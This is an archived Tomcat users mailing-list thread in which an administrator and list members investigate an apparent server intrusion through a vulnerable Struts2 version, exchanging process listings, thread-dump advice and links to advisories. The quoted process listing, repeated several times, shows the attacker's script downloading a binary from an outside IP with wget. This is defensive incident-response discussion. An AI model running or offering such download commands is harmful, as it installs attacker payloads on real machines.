-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Leonardo, On 5/5/14, 11:12 AM, Leonardo Santagostini wrote: Ok, again its uploaded. This is the link https://drive.google.com/file/d/0B5oeFmSS7h7EOFE5Nk9KMmd4RFE/edit?usp=sharing 1/2 GiB log file? Hrm. It doesn't even have any calls to Runtime.exec in it. If you have a snapshot of a thread dump (and only the thread dump, I don't need 3 weeks of your logs) that you took while the intrusion was taking place, post that. If you don't, then I think you're out of luck. Sounds like a bad time to go on holiday. - -chris -BEGIN PGP SIGNATURE- Version: GnuPG v1 Comment: GPGTools - http://gpgtools.org Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBCAAGBQJTZ7cEAAoJEBzwKT+lPKRYg0cP/1KH8lflN/Gdt8KJPJsOvmrs Jqok5NA6CsYZhI9AjxiCzK54O+HRrv8qpy9oyk1l4yCv7ims3Zd6PI6YmMmMjYbO TQiJ0ufWNI4mGj9WesHWPtFsSRsKfkhISXfKhdi3jO4p+uH03SkFivGMrKzRqkX/ IKVRV6lh2we3RFY/D/Vb0ptC/lSoy04tSI1H9IYJARI0DDh2tbVtJI1GvTp+qFch mm4/FTEh6a8XrE09EUvfyeFZKx5anEw0ybo0tU3TQHY76yOKHdP+ySjYBVGbjOx3 Ma38x1OqWBhwlfBlQbbHWl+QHbC7WhR4KHo+Aif+gQIF+DDgMURaRkJZepSzCUCt az6CKVllIErzN5eimwJxRYGFTDCn/3aRw/0Pvy7WIuReiqhaJh16PdUJCXAX8w/m Vxf+3rCziAgcTlVHJzDepQVnSOG5XYWpVNTdTwMwrKw1dWIQC9Iya8gK8R2Ynzpt kzeANOyhJE9fsmVpTxv5mx4CJuai/jF66BI92oBRnVOqr5sfAhzpstR59Njzw0H8 tHPF/XfhII1AEeLJpCiFw7PgO/zLtu6R0Z6mXnuC3vNJ0HesWaumRhqzPy9of+m/ 0FBZ5rMdPOrMY9vtnCUjTOzRWxlm0qQHI7g1UqmawtRZNuv47rkTPD92MubzAlSB EcwrNcX2iZ+JXXtSTnzH =nxGK -END PGP SIGNATURE- - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
Re: Regarding i think an intrusion
Hello Chris, but this logfile was only one day. Maybe i had a concept mismatch trying to capture the exact moment when the execution begins. My command was while [ true ]; do CUENTO=$(ps -fea | grep wget | grep -v grep | grep -v 127.0.0.1 | wc -l); if [ $CUENTO -gt 0 ] ; then PIDJAVA=$(ps -fea | grep java | grep -v grep | awk '{ print $2 }'); echo -e Se encontro wget corriendo, sacando dump de JVM... ; kill -3 $PIDJAVA; fi; sleep 3; done Maybe too many dumps all togheter, now im trying to get a live capture without luck =( If you know a better method, please letme know it. Thanks for your effort, knid regards, Leonardo Saludos.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini 2014-05-05 13:06 GMT-03:00 Christopher Schultz ch...@christopherschultz.net : -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Leonardo, On 5/5/14, 11:12 AM, Leonardo Santagostini wrote: Ok, again its uploaded. This is the link https://drive.google.com/file/d/0B5oeFmSS7h7EOFE5Nk9KMmd4RFE/edit?usp=sharing 1/2 GiB log file? Hrm. It doesn't even have any calls to Runtime.exec in it. If you have a snapshot of a thread dump (and only the thread dump, I don't need 3 weeks of your logs) that you took while the intrusion was taking place, post that. If you don't, then I think you're out of luck. Sounds like a bad time to go on holiday. - -chris -BEGIN PGP SIGNATURE- Version: GnuPG v1 Comment: GPGTools - http://gpgtools.org Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBCAAGBQJTZ7cEAAoJEBzwKT+lPKRYg0cP/1KH8lflN/Gdt8KJPJsOvmrs Jqok5NA6CsYZhI9AjxiCzK54O+HRrv8qpy9oyk1l4yCv7ims3Zd6PI6YmMmMjYbO TQiJ0ufWNI4mGj9WesHWPtFsSRsKfkhISXfKhdi3jO4p+uH03SkFivGMrKzRqkX/ IKVRV6lh2we3RFY/D/Vb0ptC/lSoy04tSI1H9IYJARI0DDh2tbVtJI1GvTp+qFch mm4/FTEh6a8XrE09EUvfyeFZKx5anEw0ybo0tU3TQHY76yOKHdP+ySjYBVGbjOx3 Ma38x1OqWBhwlfBlQbbHWl+QHbC7WhR4KHo+Aif+gQIF+DDgMURaRkJZepSzCUCt az6CKVllIErzN5eimwJxRYGFTDCn/3aRw/0Pvy7WIuReiqhaJh16PdUJCXAX8w/m Vxf+3rCziAgcTlVHJzDepQVnSOG5XYWpVNTdTwMwrKw1dWIQC9Iya8gK8R2Ynzpt kzeANOyhJE9fsmVpTxv5mx4CJuai/jF66BI92oBRnVOqr5sfAhzpstR59Njzw0H8 tHPF/XfhII1AEeLJpCiFw7PgO/zLtu6R0Z6mXnuC3vNJ0HesWaumRhqzPy9of+m/ 0FBZ5rMdPOrMY9vtnCUjTOzRWxlm0qQHI7g1UqmawtRZNuv47rkTPD92MubzAlSB EcwrNcX2iZ+JXXtSTnzH =nxGK -END PGP SIGNATURE- - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
RE: Regarding i think an intrusion
Subject: Re: Regarding i think an intrusion From: lsantagost...@gmail.com To: users@tomcat.apache.org Hello Chris, but this logfile was only one day. MGAy Caramba! Maybe i had a concept mismatch trying to capture the exact moment when the execution begins. My command was while [ true ]; do CUENTO=$(ps -fea | grep wget | grep -v grep | grep -v 127.0.0.1 | wc -l); if [ $CUENTO -gt 0 ] ; then PIDJAVA=$(ps -fea | grep java | grep -v grep | awk '{ print $2 }'); echo -e Se encontro wget corriendo, sacando dump de JVM... ; kill -3 $PIDJAVA; fi; sleep 3; done Maybe too many dumps all togheter, now im trying to get a live capture without luck =( If you know a better method, please letme know it. Thanks for your effort, knid regards, Leonardo Saludos.- Leonardo Santagostini MGTomcat APR no puede utilizar WebSockets con JDK 1.6 ...necesita utilizar JDK @ 1.7 (ahora) MGesto ContainerBackgroundProcessor[StandardEngine[Catalina]] daemon prio=10 tid=0x52867800 nid=0x2550 waiting on condition [0x4105e000] java.lang.Thread.State: TIMED_WAITING (sleeping) at java.lang.Thread.sleep(Native Method) at org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor.run(ContainerBase.java:1508) at java.lang.Thread.run(Thread.java:662) MGEstos registros informativos producen MUCHO ruido MGlog4j.properties MGlog4j.logger.org.quartz=OFF //(Callate Quartz) MGeso ajp-bio-8009-exec-37 daemon prio=10 tid=0x2aaac07fd800 nid=0x2656 runnable [0x46f34000] java.lang.Thread.State: RUNNABLE at java.util.regex.Pattern$6.isSatisfiedBy(Pattern.java:4763) at java.util.regex.Pattern$CharProperty.match(Pattern.java:3345) at java.util.regex.Pattern$Curly.match0(Pattern.java:3770) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern
Re: Regarding i think an intrusion
2014-04-30 19:07 GMT+02:00 Christopher Schultz ch...@christopherschultz.net : -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Leonardo, On 4/30/14, 12:48 PM, Leonardo Santagostini wrote: Im uploading mi logfiles so it will be available when finished uploading. Remember to get a thread dump while Runtime.exec() is running. You should copy the script /tmp/4.sh somewhere else so you have a copy in case the attacker tries to clean-up after themselves. That's certainly what's doing the evil work. You could probably set up iptables or something to restrict outgoing requests so that the attack can't progress across your network. Regarding the configuration, its working in two other sites without problem, and there is no problem putting L4 balancing with haproxy. I have asked developers about that exploit, still without answer. You appear to be using struts2 2.1.8, which is in the range of versions vulnerable to this bug. There is a workaround that you can probably apply: http://struts.apache.org/release/2.3.x/docs/s2-021.html (see the last section on this page). Of course, the vulnerability doesn't allow you to simply inject code or anything like that: you can certainly mess-around with code that is already available on the site, though. I think the S2-021 can be used to inject code. There is a POC circulating proving it. That said, this struts version (2.1.8) is also vulnerable to http://struts.apache.org/release/2.3.x/docs/s2-016.html which permits code execution very easily. - -chris -BEGIN PGP SIGNATURE- Version: GnuPG v1 Comment: GPGTools - http://gpgtools.org Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBCAAGBQJTYS3BAAoJEBzwKT+lPKRYqDsP/jmNjM+YwxySFGgPUuvcL2bN kkApblcr9ryGZQG6RGwUFr69FCJ8qFDQSZ0aXXxPCfTpM6ce1VqXPv+WcOwnueOF mrugSa2InF2IWPAP2lwhEGqyxRAYZGfxz0aA9sFb7sSw4IpDP7u6TJx9g3oYrLTt URIbzTfhY0aGgEkQlrWNgrAWFKsUQ0uOrg8+3IS52O/e1ZVdudTMQBh5/LLJ522p yr+TlMooKDY8OA1TYttE0zEe3/Z9dd2AZ4YHoqLy8Hwq0lufYSaFZ5TpHfiOgJ0I 0Q3dcXEmjMTrBkBm4JKBR9b6KZSvG/H42q0GsEFHZeGw+3VIqYFGVRR5iCRRvVgg cqVKgGevB+fefcbGX9IFgFnus8QMUYq4XOcsE1YJVflxVBEfgwsCDLZEJqpzbovV ZpNBimPoLc8I5ifo2o7GSkO1GNSjhD7Q9p5MnmNW7Qna9RJh67Lv2oft9yPqGvjZ F2dTgbKFqyr8GSy/X4Ji8FsoeK+YxF0zXXDkaXxJzu054LuhodLCHJu7WwnwGjjL 0VI/Xxfihzk9+u3HNuwK0HTEt40Tca+vEKDUlMa9fvHL3ZqM3upy50bGE0PCTrJO A1cI+e0lzKEEQ+maym65DmSYiVvUPnfv0AxA0iUfU/UbhV1yWEkD3TyF3dOZPZqH ob6Km1Clt4KNLKVyQjt+ =8KFm -END PGP SIGNATURE- - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
Re: Regarding i think an intrusion
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Cédric, On 5/1/14, 10:00 AM, Cédric Couralet wrote: 2014-04-30 19:07 GMT+02:00 Christopher Schultz ch...@christopherschultz.net : Leonardo, On 4/30/14, 12:48 PM, Leonardo Santagostini wrote: Im uploading mi logfiles so it will be available when finished uploading. Remember to get a thread dump while Runtime.exec() is running. You should copy the script /tmp/4.sh somewhere else so you have a copy in case the attacker tries to clean-up after themselves. That's certainly what's doing the evil work. You could probably set up iptables or something to restrict outgoing requests so that the attack can't progress across your network. Regarding the configuration, its working in two other sites without problem, and there is no problem putting L4 balancing with haproxy. I have asked developers about that exploit, still without answer. You appear to be using struts2 2.1.8, which is in the range of versions vulnerable to this bug. There is a workaround that you can probably apply: http://struts.apache.org/release/2.3.x/docs/s2-021.html (see the last section on this page). Of course, the vulnerability doesn't allow you to simply inject code or anything like that: you can certainly mess-around with code that is already available on the site, though. I think the S2-021 can be used to inject code. There is a POC circulating proving it. That said, this struts version (2.1.8) is also vulnerable to http://struts.apache.org/release/2.3.x/docs/s2-016.html which permits code execution very easily. Ouch. Yeah, there's always that ;) - -chris -BEGIN PGP SIGNATURE- Version: GnuPG v1 Comment: GPGTools - http://gpgtools.org Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBCAAGBQJTYsE7AAoJEBzwKT+lPKRYwqUP/1E6TUIJq618bPN0KzzvQbC4 Hny9racWUoNKFayWa9Xz/uWbQvXADyPnjO9q1BhcZW4TMyBTTksSUo33JAy567Sn tspV1ldMdOcL+y7KQUNJb9VJI9CV5h2nkeoaZacm8qmg9fZUqTihhz+qRC/U9JMa iJGKlLYIjvzPFrTXsoFnGl9yT54JAXvDf8aJPiSimD1Mu78KXCRhhterIH5QscI1 qstciSIllaSeq6EccM7b9hH4tEEXT/PwjiEoV1zSzxP01XT1qPnxtyRtNhWxer2p MDzDEimTNVshy9ilXa3MTBZh9hLcp3uEsUqmgSQyLAeLEKEEqQcsOkpQHfn9JOQQ ZXJVvhM1PuM4YsMoRcenu5Otdc5AUPh31b614Mc1NBtFRj/DVARWCU1u0Rb+mTTW HsNeRhmTfGp09x2NCokW2ncMV+coytjUwbfPGZ2yQAIZCC8k9EAxI942cKzsBVdU J7Ch3J9EEy0WxEiX8zDrHjNWWwmRBf0BexEQqnnCgQCMWAoVjRcPo75LChY60uDP vvB5Z/iGtbfFSwKEPVvYJhDzMJm3tlxVVdhmT+nejig6S4vdhAY/yDIxnNUm7waE IEJ7xtN5Ev3XLxT1fR34kw3n+0aRXiWyZzMTr2gTyf6C/Y9moz0wPyliBz0qKh67 hEEF98sa1D+pfJC5FGdj =ZJPK -END PGP SIGNATURE- - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
Re: Regarding i think an intrusion
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Konstantin, On 4/29/14, 4:54 PM, Konstantin Kolinko wrote: 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini lsantagost...@gmail.com: Hello Dan, Nop, the attacker is executing locally the following tomcat8882 1 0 Apr27 ?00:00:00 sh /tmp/4.sh tomcat8893 8882 0 Apr27 ?00:00:00 wget http://218.199.102.59/.xy/squid32 -O /tmp/squid And the launch squid who tries to connect via ssh to varoius places. Right now its time to leave the office, but in a few hours i will paste in pastebin access logs, config files, wherever you tell me. This is my pstree [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree init─┬─atd ├─java─┬─sh───wget │ └─263*[{java}] sh launched by tomcat's java? Yes: please verify that it's the JVM running Tomcat, and not just any JVM process. Take a thread dump: https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F It shall show what is stacktrace in thread that launched external process. +1 The only things that ship with Tomcat that call Process.exec() are the CGI servlet and SSI, both of which are disabled by default. So, either you have an insecure CGI/SSI configuration, your web application has a vulnerability, or you have deployed something like the Manager application and improperly-secured it. A classic example of such an intrusion might be that someone got a foothold elsewhere into your network, and the Manager web application is not properly secured with a password, etc. - -chris -BEGIN PGP SIGNATURE- Version: GnuPG v1 Comment: GPGTools - http://gpgtools.org Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBCAAGBQJTYQDeAAoJEBzwKT+lPKRYaPoQAKpqrj5bWfGXpEEHMINjw1Qp +qqdL7O61QLmWoA1neUbyM7A2s8mY3lRdcZwDw2IG33xoeLuFaavhFlDGr2Txer4 HiGDR8ixOv2mY9J9bMC889hih4N5dz0fYlw/b5SouUVz2aCbeUhYK+6lsBXRy2fC D+UoNOiQF6uX2ZlqJYZTAvgzC2t/SGGnTW3GLx+3buRxs4JlUjJ8RWEOZtjZLQ5o gUZ+UF6K/7dewYr6TjDmwc1C226dJNaliymQu2qbVgpRvoJ+baRgpeoyt6hzhIxr BA8gjKY5xOH6QrpSX2tdU8RNCRVLIgSmbp9Mj+Hovdw4kkDMLQvS3osuGq5HaEwS ZMltWiTef+K2yZyO3L8xrsJaRbox1j8Pg38ea22GRE48kpNagoQdCM2+uMCVN8Yj UFjUrcpMu0FX06dy8azbFDRZMv5lD8nmwgE624nT+gZfFaxGHNLa9dRpJWHZgvTb TSESKHv2lq9F4qc7bxoVrRDa8hnNLHk2luU9qot5JWXnb5en0fFKMZopwXwXYA4W WgGA0Cfy4gALkA4/CCqrsn6Z+EqIxXNdCn74CeeCh5fV28+0Zpuj7G1adtJUkCQ7 87Cq6kXwHx4hfp//6vQhnZIGWYeKDOIgqbKuaP27pIcE1QCag5MOlmVT4pQjpT12 lvJcfOhzHLwo07Pv+y3J =EiX9 -END PGP SIGNATURE- - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
Re: Regarding i think an intrusion
Ok, i will do the following: 1) thread dump of running tomcat instance 2) Pastebin the running tomcat config I think at mid day will have all the info. Thanks all for replying me and all the responses. Regards, Leonardo Saludos.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini 2014-04-30 10:55 GMT-03:00 Christopher Schultz ch...@christopherschultz.net : -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Konstantin, On 4/29/14, 4:54 PM, Konstantin Kolinko wrote: 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini lsantagost...@gmail.com: Hello Dan, Nop, the attacker is executing locally the following tomcat8882 1 0 Apr27 ?00:00:00 sh /tmp/4.sh tomcat8893 8882 0 Apr27 ?00:00:00 wget http://218.199.102.59/.xy/squid32 -O /tmp/squid And the launch squid who tries to connect via ssh to varoius places. Right now its time to leave the office, but in a few hours i will paste in pastebin access logs, config files, wherever you tell me. This is my pstree [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree init─┬─atd ├─java─┬─sh───wget │ └─263*[{java}] sh launched by tomcat's java? Yes: please verify that it's the JVM running Tomcat, and not just any JVM process. Take a thread dump: https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F It shall show what is stacktrace in thread that launched external process. +1 The only things that ship with Tomcat that call Process.exec() are the CGI servlet and SSI, both of which are disabled by default. So, either you have an insecure CGI/SSI configuration, your web application has a vulnerability, or you have deployed something like the Manager application and improperly-secured it. A classic example of such an intrusion might be that someone got a foothold elsewhere into your network, and the Manager web application is not properly secured with a password, etc. - -chris -BEGIN PGP SIGNATURE- Version: GnuPG v1 Comment: GPGTools - http://gpgtools.org Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBCAAGBQJTYQDeAAoJEBzwKT+lPKRYaPoQAKpqrj5bWfGXpEEHMINjw1Qp +qqdL7O61QLmWoA1neUbyM7A2s8mY3lRdcZwDw2IG33xoeLuFaavhFlDGr2Txer4 HiGDR8ixOv2mY9J9bMC889hih4N5dz0fYlw/b5SouUVz2aCbeUhYK+6lsBXRy2fC D+UoNOiQF6uX2ZlqJYZTAvgzC2t/SGGnTW3GLx+3buRxs4JlUjJ8RWEOZtjZLQ5o gUZ+UF6K/7dewYr6TjDmwc1C226dJNaliymQu2qbVgpRvoJ+baRgpeoyt6hzhIxr BA8gjKY5xOH6QrpSX2tdU8RNCRVLIgSmbp9Mj+Hovdw4kkDMLQvS3osuGq5HaEwS ZMltWiTef+K2yZyO3L8xrsJaRbox1j8Pg38ea22GRE48kpNagoQdCM2+uMCVN8Yj UFjUrcpMu0FX06dy8azbFDRZMv5lD8nmwgE624nT+gZfFaxGHNLa9dRpJWHZgvTb TSESKHv2lq9F4qc7bxoVrRDa8hnNLHk2luU9qot5JWXnb5en0fFKMZopwXwXYA4W WgGA0Cfy4gALkA4/CCqrsn6Z+EqIxXNdCn74CeeCh5fV28+0Zpuj7G1adtJUkCQ7 87Cq6kXwHx4hfp//6vQhnZIGWYeKDOIgqbKuaP27pIcE1QCag5MOlmVT4pQjpT12 lvJcfOhzHLwo07Pv+y3J =EiX9 -END PGP SIGNATURE- - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
Re: Regarding i think an intrusion
Hello list, well my homework is done Here are the links: setenv.sh: http://pastebin.com/EN1mXDFi catalina.sh: http://pastebin.com/1vRVLbSm web.xml: http://pastebin.com/BqEfiXXm server.xml: http://pastebin.com/wfzE8bYU logging.properties: http://pastebin.com/Qurk8sLU catalina.properties: http://pastebin.com/jkfY1ZRQ tree + logsfiles: http://pastebin.com/j3tip4ij Note that logsfiles, are not the logfiles itsef but only a ls -lah (just for you to see the logsizes) A little more about the infraestructure i've mounted ill do some ascii art. internet --- FW --nat--Haproxy (1)--Apache(2)-- mod_jk (3)--Haproxy(4)-- Tomcat7(5) -- haproxy(6) --Tomcat(7) Apache(2) is serving static content so haproxy(1) at the first level does http round robin balancing Apache(2) connects to tomcat(5) through haproxy(4) (using L4 connection) using mod_jk(3) Tomcat(5) are the main app server (the ones gets intruded) who uses tomcat(7) (solr service) using haproxy(6) using L4 connection. Versions: Apache: 2.2.17 mod_jk: 1.2.31 haproxy: 1.4.22 Tomcat: 7.0.53 Java: 1.6.0.41 [root@arcbaappvrt05 tomcat]# /usr/java/default/bin/java -version java version 1.6.0_41 Java(TM) SE Runtime Environment (build 1.6.0_41-b02) Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode) OS: CentOS 5.8 64 bit [root@arcbaappvrt05 tomcat]# uname -a Linux arcbaappvrt05.tic.yellargentina.com 2.6.18-308.el5 #1 SMP Tue Feb 21 20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux [root@arcbaappvrt05 tomcat]# cat /etc/redhat-release CentOS release 5.8 (Final) [root@arcbaappvrt05 tomcat]# For now i havent see that the squid process whas launched so i couldnt do a dump Letme know if you need more information. BTW, pastebin links will work for one week. Kind regards, yours Saludos.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini 2014-04-30 11:09 GMT-03:00 Leonardo Santagostini lsantagost...@gmail.com: Ok, i will do the following: 1) thread dump of running tomcat instance 2) Pastebin the running tomcat config I think at mid day will have all the info. Thanks all for replying me and all the responses. Regards, Leonardo Saludos.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini 2014-04-30 10:55 GMT-03:00 Christopher Schultz ch...@christopherschultz.net: -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Konstantin, On 4/29/14, 4:54 PM, Konstantin Kolinko wrote: 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini lsantagost...@gmail.com: Hello Dan, Nop, the attacker is executing locally the following tomcat8882 1 0 Apr27 ?00:00:00 sh /tmp/4.sh tomcat8893 8882 0 Apr27 ?00:00:00 wget http://218.199.102.59/.xy/squid32 -O /tmp/squid And the launch squid who tries to connect via ssh to varoius places. Right now its time to leave the office, but in a few hours i will paste in pastebin access logs, config files, wherever you tell me. This is my pstree [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree init─┬─atd ├─java─┬─sh───wget │ └─263*[{java}] sh launched by tomcat's java? Yes: please verify that it's the JVM running Tomcat, and not just any JVM process. Take a thread dump: https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F It shall show what is stacktrace in thread that launched external process. +1 The only things that ship with Tomcat that call Process.exec() are the CGI servlet and SSI, both of which are disabled by default. So, either you have an insecure CGI/SSI configuration, your web application has a vulnerability, or you have deployed something like the Manager application and improperly-secured it. A classic example of such an intrusion might be that someone got a foothold elsewhere into your network, and the Manager web application is not properly secured with a password, etc. - -chris -BEGIN PGP SIGNATURE- Version: GnuPG v1 Comment: GPGTools - http://gpgtools.org Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBCAAGBQJTYQDeAAoJEBzwKT+lPKRYaPoQAKpqrj5bWfGXpEEHMINjw1Qp +qqdL7O61QLmWoA1neUbyM7A2s8mY3lRdcZwDw2IG33xoeLuFaavhFlDGr2Txer4 HiGDR8ixOv2mY9J9bMC889hih4N5dz0fYlw/b5SouUVz2aCbeUhYK+6lsBXRy2fC D+UoNOiQF6uX2ZlqJYZTAvgzC2t/SGGnTW3GLx+3buRxs4JlUjJ8RWEOZtjZLQ5o gUZ+UF6K/7dewYr6TjDmwc1C226dJNaliymQu2qbVgpRvoJ+baRgpeoyt6hzhIxr BA8gjKY5xOH6QrpSX2tdU8RNCRVLIgSmbp9Mj+Hovdw4kkDMLQvS3osuGq5HaEwS ZMltWiTef+K2yZyO3L8xrsJaRbox1j8Pg38ea22GRE48kpNagoQdCM2+uMCVN8Yj UFjUrcpMu0FX06dy8azbFDRZMv5lD8nmwgE624nT+gZfFaxGHNLa9dRpJWHZgvTb TSESKHv2lq9F4qc7bxoVrRDa8hnNLHk2luU9qot5JWXnb5en0fFKMZopwXwXYA4W WgGA0Cfy4gALkA4/CCqrsn6Z+EqIxXNdCn74CeeCh5fV28+0Zpuj7G1adtJUkCQ7 87Cq6kXwHx4hfp//6vQhnZIGWYeKDOIgqbKuaP27pIcE1QCag5MOlmVT4pQjpT12 lvJcfOhzHLwo07Pv+y3J =EiX9 -END PGP SIGNATURE- - To unsubscribe, e-mail:
Re: Regarding i think an intrusion
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Leonardo, You need to post a thread dump as well. - -chris On 4/30/14, 11:35 AM, Leonardo Santagostini wrote: Hello list, well my homework is done Here are the links: setenv.sh: http://pastebin.com/EN1mXDFi catalina.sh: http://pastebin.com/1vRVLbSm web.xml: http://pastebin.com/BqEfiXXm server.xml: http://pastebin.com/wfzE8bYU logging.properties: http://pastebin.com/Qurk8sLU catalina.properties: http://pastebin.com/jkfY1ZRQ tree + logsfiles: http://pastebin.com/j3tip4ij Note that logsfiles, are not the logfiles itsef but only a ls -lah (just for you to see the logsizes) A little more about the infraestructure i've mounted ill do some ascii art. internet --- FW --nat--Haproxy (1)--Apache(2)-- mod_jk (3)--Haproxy(4)-- Tomcat7(5) -- haproxy(6) --Tomcat(7) Apache(2) is serving static content so haproxy(1) at the first level does http round robin balancing Apache(2) connects to tomcat(5) through haproxy(4) (using L4 connection) using mod_jk(3) Tomcat(5) are the main app server (the ones gets intruded) who uses tomcat(7) (solr service) using haproxy(6) using L4 connection. Versions: Apache: 2.2.17 mod_jk: 1.2.31 haproxy: 1.4.22 Tomcat: 7.0.53 Java: 1.6.0.41 [root@arcbaappvrt05 tomcat]# /usr/java/default/bin/java -version java version 1.6.0_41 Java(TM) SE Runtime Environment (build 1.6.0_41-b02) Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode) OS: CentOS 5.8 64 bit [root@arcbaappvrt05 tomcat]# uname -a Linux arcbaappvrt05.tic.yellargentina.com 2.6.18-308.el5 #1 SMP Tue Feb 21 20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux [root@arcbaappvrt05 tomcat]# cat /etc/redhat-release CentOS release 5.8 (Final) [root@arcbaappvrt05 tomcat]# For now i havent see that the squid process whas launched so i couldnt do a dump Letme know if you need more information. BTW, pastebin links will work for one week. Kind regards, yours Saludos.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini 2014-04-30 11:09 GMT-03:00 Leonardo Santagostini lsantagost...@gmail.com: Ok, i will do the following: 1) thread dump of running tomcat instance 2) Pastebin the running tomcat config I think at mid day will have all the info. Thanks all for replying me and all the responses. Regards, Leonardo Saludos.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini 2014-04-30 10:55 GMT-03:00 Christopher Schultz ch...@christopherschultz.net: -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Konstantin, On 4/29/14, 4:54 PM, Konstantin Kolinko wrote: 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini lsantagost...@gmail.com: Hello Dan, Nop, the attacker is executing locally the following tomcat8882 1 0 Apr27 ?00:00:00 sh /tmp/4.sh tomcat8893 8882 0 Apr27 ?00:00:00 wget http://218.199.102.59/.xy/squid32 -O /tmp/squid And the launch squid who tries to connect via ssh to varoius places. Right now its time to leave the office, but in a 